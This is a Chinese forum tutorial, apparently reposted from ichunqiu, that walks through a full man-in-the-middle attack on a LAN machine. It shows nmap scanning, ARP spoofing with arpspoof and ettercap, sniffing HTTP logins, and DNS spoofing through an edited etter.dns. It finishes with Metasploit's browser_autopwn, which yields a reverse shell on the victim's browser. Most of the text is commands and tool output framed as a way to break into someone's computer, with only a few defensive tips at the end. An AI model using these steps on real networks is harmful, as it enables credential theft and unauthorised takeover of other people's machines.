來源：http://bbs.ichunqiu.com/thread-9156-1-1.html?from=ch

00x01

如果在同局域網(wǎng)下你想嘗試攻破對方機(jī)器但是他并沒有開放你可利用的端口進(jìn)行攻擊

但是你驚訝的發(fā)現(xiàn)，你在Http劫持的時候看到一個可疑的郵箱與密碼，這樣你便拿下了他的賬戶

但是你想深入到他的計(jì)算機(jī)中留下你想要的痕跡來顯示你驚人的技術(shù)

But，你沒有任何方式，只能眼睜睜的看著他逃脫你得魔爪，可是你甘心么？

00x02

攻擊器前的準(zhǔn)備

1#Kali系統(tǒng)一臺

2#被攻擊者郵箱

#####################################

#####################################

00X03

攻擊前信息搜集

1#被攻擊者ip:192.168.1.106-

2#被攻擊者網(wǎng)關(guān)：192.168.1.1

00x04

既然我們已經(jīng)得到他的ip，那么我們先掃一下他的端口

命令：

nmap -A 192.168.1.106

復(fù)制代碼

反饋信息:

135/tcp? ?open??msrpc

139/tcp? ?open??netbios-ssn

445/tcp? ?open??microsoft-ds

49152/tcp open??unknown

49154/tcp open??unknown

49155/tcp open??unknown

49158/tcp open??unknown

復(fù)制代碼

可以看見，開放端口并不多，135,139,445端口雖然是開放的，但是已經(jīng)打了補(bǔ)丁，無法直接攻擊反彈得到shell

我們先劫持他的Http，看看有什么可利用的信息。

1# 進(jìn)行流量轉(zhuǎn)發(fā)，讓目標(biāo)流量經(jīng)過本機(jī)

命令：

echo 1 >> /proc/sys/net/ipv4/ip_forward[/font]

復(fù)制代碼

注釋：把1寫入ip_forward文件中

命令：

cat /proc/sys/net/ipv4/ip_forward

復(fù)制代碼

注釋：檢查是否已經(jīng)寫入

可以看見，1已經(jīng)寫入ip_forward中了，我們利用Arpspoof這款工具開始進(jìn)行Arp欺騙

命令：arpspoof -t 192.168.1.106 192.168.1.1

復(fù)制代碼

如上圖便是欺騙成功了，So~ 那么我們先開始劫持他的Http密文

命令:

ettercap -Tq -i eth0

復(fù)制代碼

開始劫持~~??因?yàn)椴皇钦鎸?shí)攻擊，所以我來偽造一個登錄的數(shù)據(jù)流發(fā)過去。

成功截取到，如

User=賬戶

Pass=密碼

當(dāng)然，Http跟Https劫持的方式是不同的。

現(xiàn)在還遠(yuǎn)遠(yuǎn)不夠，我們還是沒有突破口，感覺好頭大，與是一個奇穎怪招出來了，攻擊他的瀏覽器，從而突破拿到權(quán)限

我們先打開metasploit

命令:

msfconsole

復(fù)制代碼

當(dāng)然，再此之前我們需要啟動他所需要的服務(wù)

命令:

service postgresql start

復(fù)制代碼

啟動成功，我們接著加載他的Browser_autopwn模塊這是一個自動攻擊瀏覽器的模塊。它會自動感應(yīng)攻擊目標(biāo)的瀏覽器并且對它發(fā)動適當(dāng)?shù)墓簟?/p>

命令：

use server/browser_autopwn

復(fù)制代碼

查看所需要的設(shè)置

命令:

show options

復(fù)制代碼

他會顯示以下東西

Module options (auxiliary/server/browser_autopwn):

Name? ???Current Setting??Required??Description

----? ???---------------??--------??-----------

LHOST? ?? ?? ?? ?? ?? ?? ?yes? ?? ? The IP address to use for reverse-connect payloads

SRVHOST??0.0.0.0? ?? ?? ? yes? ?? ? The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT??8080? ?? ?? ?? ? yes? ?? ? The local port to listen on

SSL? ?? ?false? ?? ?? ?? ?no? ?? ???Negotiate SSL for incoming connections

SSLCert? ?? ?? ?? ?? ?? ? no? ?? ???Path to a custom SSL certificate (default is randomly generated)

URIPATH? ?? ?? ?? ?? ?? ? no? ?? ???The URI to use for this exploit (default is random)

復(fù)制代碼

我們開始設(shè)置：

命令：

set uripath /

復(fù)制代碼

命令：

set LHOST （你的IP地址）

復(fù)制代碼

命令：

run

復(fù)制代碼

稍等 一下，他會出現(xiàn)以下東西

出現(xiàn)這個就算是成功了，為了能讓目標(biāo)主機(jī)能訪問到這個ip地址，我們就必須先DNS劫持跳轉(zhuǎn)

我們先修改kali下的index.html

命令：

leafpad /var/www/html/index.html

復(fù)制代碼

我們寫一個html跳轉(zhuǎn):

hello AnaLyz3r

i am X_Al3r

Ichunqiu

復(fù)制代碼

OK。保存后我們先開啟apache2服務(wù)使kali成為一臺web服務(wù)器

命令：

/etc/init.d/apache2 start

復(fù)制代碼

提示:

[ ok ] Starting apache2 (via systemctl): apache2.service

復(fù)制代碼

表示成功

我們繼續(xù)來配置ettercap文件

命令：

leafpad /etc/ettercap/etter.dns

復(fù)制代碼

會出現(xiàn)一下東西。

############################################################################

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#??ettercap -- etter.dns -- host file for dns_spoof plugin? ?? ?? ?? ?? ???#

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#??Copyright (C) ALoR & NaGA? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#??This program is free software; you can redistribute it and/or modify? ? #

#??it under the terms of the GNU General Public License as published by? ? #

#??the Free Software Foundation; either version 2 of the License, or? ?? ? #

#??(at your option) any later version.? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

############################################################################

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# Sample hosts file for dns_spoof plugin? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# the format is (for A query):? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#

#? ?www.myhostname.com A 168.11.22.33? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#? ?*.foo.com? ?? ?? ? A 168.44.55.66? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# ... for a AAAA query (same hostname allowed):? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ?www.myhostname.com AAAA 2001:db8::1? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#

#? ?*.foo.com? ?? ?? ? AAAA 2001:db8::2? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# or to skip a protocol family (useful with dual-stack):? ?? ?? ?? ?? ?? ? #

#? ?www.hotmail.com? ?AAAA ::? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#

#? ?www.yahoo.com? ?? ?A? ? 0.0.0.0? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# or for PTR query:? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#? ?www.bar.com? ? PTR 10.0.0.10? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ?www.google.com PTR ::1? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# or for MX query (either IPv4 or IPv6):? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#? ? domain.com MX xxx.xxx.xxx.xxx? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

#? ? domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx? ?? ?? ?? ?? ? #

#? ? domain3.com MX xxxx:xxxx::y? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# or for WINS query:? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ? workgroup WINS 127.0.0.1? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ? PC*? ?? ? WINS 127.0.0.1? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# or for SRV query (either IPv4 or IPv6):? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #

#? ? service._tcp|_udp.domain SRV 192.168.1.10:port? ?? ?? ?? ?? ?? ?? ?? ?#

#? ? service._tcp|_udp.domain SRV [2001:db8::3]:port? ?? ?? ?? ?? ?? ?? ???#

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# or for TXT query (value must be wrapped in double quotes):? ?? ?? ?? ?? ?#

#? ? google.com TXT "v=spf1 ip4:192.168.0.3/32 ~all"? ?? ?? ?? ?? ?? ?? ???#

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

# NOTE: the wildcarded hosts can't be used to poison the PTR requests? ?? ?#

#? ?? ? so if you want to reverse poison you have to specify a plain? ?? ? #

#? ?? ? host. (look at the www.microsoft.com example)? ?? ?? ?? ?? ?? ?? ? #

#? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#

############################################################################

################################

# microsoft sucks ;)

# redirect it towww.linux.org

#

microsoft.com? ?? ?A? ?107.170.40.56

*.microsoft.com? ? A? ?107.170.40.56

www.microsoft.com??PTR 107.170.40.56? ?? ?# Wildcards in PTR are not allowed

*? ?? ?? ?? ?? ?? ?A? ?192.168.1.106? ?? ?? ?? ?? ?#復(fù)制修改你kali上的ip

*? ?? ?? ?? ?? ?? ?PTR 192.168.1.106? ?? ?? ?? ?#扶著修改你kali上的ip

##########################################

# no one out there can have our domains...

#

www.alor.org??A 127.0.0.1

www.naga.org??A 127.0.0.1

www.naga.org??AAAA 2001:db8::2

##########################################

# dual stack enabled hosts does not make life easy

# force them back to single stack

www.ietf.org? ?A? ? 127.0.0.1

www.ietf.org? ?AAAA ::

www.example.org??A? ? 0.0.0.0

www.example.org??AAAA ::1

###############################################

# one day we will have our ettercap.org domain

#

www.ettercap.org? ?? ?? ???A??127.0.0.1

www.ettercap-project.org? ?A??127.0.0.1

ettercap.sourceforge.net? ?A??23.235.43.133

www.ettercap.org? ?? ?? ???PTR ::1

###############################################

# some MX examples

#

alor.org? ?MX??127.0.0.1

naga.org? ?MX??127.0.0.1

example.org MX 127.0.0.2

microsoft.com MX 2001:db8::1ce:c01d:bee3

###############################################

# This messes up NetBIOS clients using DNS

# resolutions. I.e. Windows/Samba file sharing.

#

LAB-PC*??WINS??127.0.0.1

###############################################

# some service discovery examples

xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269

ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389

###############################################

# little example for TXT records

#

naga.org TXT "v=spf1 ip4:192.168.1.2 ip6:2001:db8:d0b1:beef::2 -all"

# vim:ts=8:noexpandtab

復(fù)制代碼

修改第62行與63行

修改成功后我們啟動ettercar

命令：

ettercap -G

復(fù)制代碼-G為圖形化啟動

-T為文本模式

我們先Ctrl+u 選擇eth0無線網(wǎng)卡選擇wlan0

一為掃局域網(wǎng)下存活主機(jī)，二為列出存活主機(jī)列表

被攻擊者ip設(shè)置為第二個選項(xiàng)，網(wǎng)關(guān)設(shè)置為第三個選項(xiàng)

勾上第一個，我們開始進(jìn)行arp欺騙

我們接下來選擇dns_spoof模塊

雙擊進(jìn)行選擇，選擇成功后他會有一個*號出現(xiàn)。

開始進(jìn)行啟動。

我們ping一下百度發(fā)現(xiàn)ip已經(jīng)變成我kali上的IP了，那么DNS已經(jīng)劫持成功

我們寫的html也開始發(fā)揮作用了

一般人是不會懷疑的直接進(jìn)行更新，那么在他更新的一瞬間，他就已經(jīng)中招了他的瀏覽器已經(jīng)開始被攻擊

在嘩啦嘩啦一堆下面他會出現(xiàn)一個反彈的shell那么權(quán)限也就拿到了

例如是什么系統(tǒng)，等信息已經(jīng)出來了，耐心等待就會返回一個shell

00x05

總結(jié)

1# 有時候無法攻破局域網(wǎng)的主機(jī)的時候可以嘗試進(jìn)行瀏覽器攻擊得到權(quán)限

2# 不一定只有msf的那個模塊才可以進(jìn)行瀏覽器攻擊例如beff也是可以的

3# Dns的確是個很不錯的幫手，他會幫助你少去很多麻煩

防護(hù)建議

1#??瀏覽器補(bǔ)丁要經(jīng)常打，對于系統(tǒng)漏洞也需要經(jīng)常打補(bǔ)丁

2#??開啟Arp防火墻

3# 發(fā)現(xiàn)DNS不對勁立刻糾正過來否則會承受系統(tǒng)淪陷的后果

4# 殺軟防火墻等是需要存在的，